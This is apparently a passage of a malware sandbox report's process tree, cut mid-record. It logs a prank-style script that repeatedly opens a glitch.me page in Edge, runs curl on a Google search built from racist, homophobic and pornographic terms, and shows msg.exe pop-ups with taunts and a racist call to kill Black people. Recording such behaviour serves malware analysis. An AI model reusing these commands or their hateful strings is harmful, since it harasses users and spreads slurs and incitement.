      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6048
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5064
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4232
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2932
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6048
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5652
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4908
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1452
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4376
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4120
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:664
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6140
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5064
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6048
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3020
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4120
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5588
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3020
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4576
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4376
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4332
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3020
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4576
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6464
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6488
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6512
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6536
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6552
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6580
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6592
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6740
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6764
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6788
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6804
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6820
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6844
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6852
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7060
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7084
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7108
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7124
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7148
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6076
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6244
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4576
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6508
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6488
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6512
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4072
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6572
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6704
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7004
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5796
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:924
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4504
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5512
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7044
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7132
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1968
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6432
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4152
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6160
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6260
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6468
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6544
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6860
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3616
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6756
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7008
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7028
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7024
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6704
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6316
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4072
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6788
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6888
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6908
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6560
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4480
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7080
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2448
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5752
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3124
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6324
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5088
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6484
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6292
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6488
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6304
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5684
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6856
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4092
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6780
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4500
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4504
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7080
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5064
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6300
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6444
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6428
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5684
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6800
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6288
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4928
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5856
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6736
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3616
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5144
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6404
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6292
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3796
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6264
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6764
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1956
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2572
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4072
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6756
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6316
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6548
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:300
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6756
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5168
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6524
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6428
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6548
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3884
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3616
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6272
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7208
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7224
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7240
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7256
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7272
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7288
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7348
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7444
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7460
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7476
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7492
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7508
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7524
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7636
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7712
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7728
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7744
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7760
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7776
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7792
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7908
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7532
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7544
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7560
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7652
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7656
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7724
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7740
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7744
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7760
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7776
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7792
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7824
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7844
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7952
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7988
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4852
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4364
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3848
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3452
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2368
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5256
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8076
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8096
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8120
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7192
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8188
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4120
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8068
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7216
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6272
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7244
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7276
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5312
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1484
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3256
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:300
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7960
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3620
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4076
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3996
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4224
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3604
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4840
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4216
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6116
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7328
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1500
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2348
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2952
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7704
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1792
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2916
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4112
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5568
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7340
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4996
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5964
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1624
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3600
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4140
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2756
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5980
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5220
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3632
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3384
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6136
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7288
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1768
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5212
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2328
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7440
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2956
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4884
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4344
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3388
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4220
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3376
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6100
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7352
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7356
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3836
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4756
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3492
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4644
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:528
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5812
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4108
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3868
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7200
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3948
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1748
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1440
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3324
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
